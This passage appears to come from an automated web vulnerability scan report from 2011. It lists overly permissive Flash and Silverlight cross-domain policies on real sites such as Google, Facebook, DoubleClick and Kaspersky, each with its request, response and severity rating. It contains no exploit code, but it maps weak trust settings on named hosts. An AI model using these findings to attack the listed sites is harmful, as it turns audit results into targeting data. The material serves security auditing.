<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted
...[SNIP]...

2.43. http://tr1.kaspersky.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tr1.kaspersky.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tr1.kaspersky.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:19:28 GMT
Server: Omniture DC/2.0.0
xserver: www57
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

2.44. http://www.etracker.de/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.etracker.de
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.etracker.de

Response

HTTP/1.1 200 OK
ETag: "15f777-96-4aa13752fa580"
Accept-Ranges: bytes
Content-Length: 150
Date: Sun, 04 Sep 2011 12:15:33 GMT
Connection: close
Last-Modified: Tue, 09 Aug 2011 14:34:14 GMT
Server: Apache
Content-Type: application/xml
Keep-Alive: timeout=5, max=100

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.45. http://www.widgetserver.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.widgetserver.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.widgetserver.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:16:56 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 10 Aug 2011 23:11:48 GMT
ETag: "106-4aa2ecdfd7500"
Accept-Ranges: bytes
Content-Length: 262
Vary: Accept-Encoding
X-WBX: wsynd02
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted
...[SNIP]...

2.46. https://adwords.google.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 13:59:53 GMT
Date: Sun, 04 Sep 2011 13:59:53 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

2.47. http://api.demandbase.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.demandbase.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.demandbase.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 12:16:02 GMT
Last-Modified: Fri, 02 Sep 2011 19:00:47 GMT
Server: nginx/1.0.4
Content-Length: 275
Connection: Close

<cross-domain-policy>
<allow-access-from domain="*.demandbase.com" to-ports="80,443" secure="false" />
<allow-access-from domain="*.fireraven.com" to-ports="80,443" secure="false" />
<site-contr
...[SNIP]...

2.48. http://disqus.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://disqus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:12:51 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-User: anon:608614822849
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Length: 244
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

2.49. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:22:19 GMT
Expires: Sun, 04 Sep 2011 23:22:19 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 46382
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

2.50. http://wd.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wd.sharethis.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 12:13:05 GMT
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

2.51. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.62.189.52
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

2.52. http://www.spamfighter.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.spamfighter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spamfighter.com

Response

HTTP/1.0 200 OK
Content-Length: 312
Content-Type: text/xml
Last-Modified: Mon, 28 Jun 2004 00:18:00 GMT
Accept-Ranges: bytes
ETag: "02c9e5ea55cc41:2e8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 12:12:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.jubii.dk" />
<allow-access-from domain="i.jubii.dk" />
<allow-access-from domain="concept.jubii.dk" />
...[SNIP]...

2.53. http://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:32 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 12:43:32 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

2.54. https://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://api.twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:59:54 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 14:29:54 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

2.55. https://docs.google.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 14:00:14 GMT
Date: Sun, 04 Sep 2011 14:00:14 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

2.56. https://drh.img.digitalriver.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://drh.img.digitalriver.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: drh.img.digitalriver.com

Response

HTTP/1.0 200 OK
ETag: "da-4ae73ece"
Content-Type: text/xml
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=66808035819,0)
Last-Modified: Tue, 27 Oct 2009 18:41:18 GMT
Content-Length: 218
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app72
Accept-Ranges: bytes
Date: Sun, 04 Sep 2011 14:00:14 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="gc.digitalriver.com" />
<allow-access-from domain="cx.digitalriver.com" />
</cr
...[SNIP]...

2.57. https://github.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://github.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: github.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sun, 04 Sep 2011 14:00:21 GMT
Content-Type: text/xml
Content-Length: 372
Last-Modified: Sun, 06 Sep 2009 02:25:28 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="gist.github.com" />
...[SNIP]...

3. Silverlight cross-domain policy previous next
There are 13 instances of this issue:

http://ad-apac.doubleclick.net/clientaccesspolicy.xml
http://ad-emea.doubleclick.net/clientaccesspolicy.xml
http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://b.voicefive.com/clientaccesspolicy.xml
http://clk.atdmt.com/clientaccesspolicy.xml
http://idgenterprise.112.2o7.net/clientaccesspolicy.xml
http://pixel.quantserve.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml
http://secure-au.imrworldwide.com/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://spe.atdmt.com/clientaccesspolicy.xml
http://tr1.kaspersky.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

3.1. http://ad-apac.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sun, 04 Sep 2011 13:59:41 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

3.2. http://ad-emea.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Sun, 04 Sep 2011 13:59:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

3.3. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sun, 04 Sep 2011 13:59:44 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

3.4. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 12:13:05 GMT
Date: Sun, 04 Sep 2011 12:13:05 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

3.5. http://b.voicefive.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 12:15:14 GMT
Date: Sun, 04 Sep 2011 12:15:14 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

3.6. http://clk.atdmt.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Date: Sun, 04 Sep 2011 14:00:03 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

3.7. http://idgenterprise.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idgenterprise.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: idgenterprise.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:18 GMT
Server: Omniture DC/2.0.0
xserver: www27
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

3.8. http://pixel.quantserve.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 12:14:27 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 12:14:27 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

3.9. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 04:50:02 GMT
Expires: Sun, 04 Sep 2011 04:49:49 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 26645
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

3.10. http://secure-au.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-au.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:47 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sun, 11 Sep 2011 12:13:47 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

3.11. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 12:16:59 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 12:16:59 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

3.12. http://spe.atdmt.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Mon, 05 Sep 2011 11:21:19 GMT
Date: Sun, 04 Sep 2011 12:15:18 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

3.13. http://tr1.kaspersky.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tr1.kaspersky.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: tr1.kaspersky.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:19:28 GMT
Server: Omniture DC/2.0.0
xserver: www105
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4. Cleartext submission of password previous next
There are 16 instances of this issue:

http://account.theregister.co.uk/register/
http://digg.com/submit
http://forum.kaspersky.com/index.php
http://virusalert.nl/
http://www.2linkme.com/
http://www.h-online.com/userdb/sso
http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
